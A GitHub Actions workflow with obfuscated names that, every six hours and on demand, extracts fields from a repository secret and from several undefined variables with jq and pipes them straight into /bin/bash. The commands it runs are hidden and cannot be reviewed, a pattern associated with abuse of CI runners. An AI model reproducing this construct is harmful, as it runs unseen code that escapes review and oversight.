name: xiangyuhuanliu

on:
  workflow_dispatch:
  schedule:
    - cron: '46 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangyuhuanliu
        env:
          qbmo6488: ${{ secrets.qbmo6488 }}
        run: |
          echo $qbmo6488 | jq -r .lws182 | /bin/bash
          echo $lfugy283 | jq -r .cqmqz882 | /bin/bash
          echo $sv114 | jq -r .arwxm5 | /bin/bash
          echo $jwsh55117 | jq -r .fw12 | /bin/bash
          echo $fp617 | jq -r .l92 | /bin/bash
          echo $avhan223 | jq -r .zivae4416 | /bin/bash

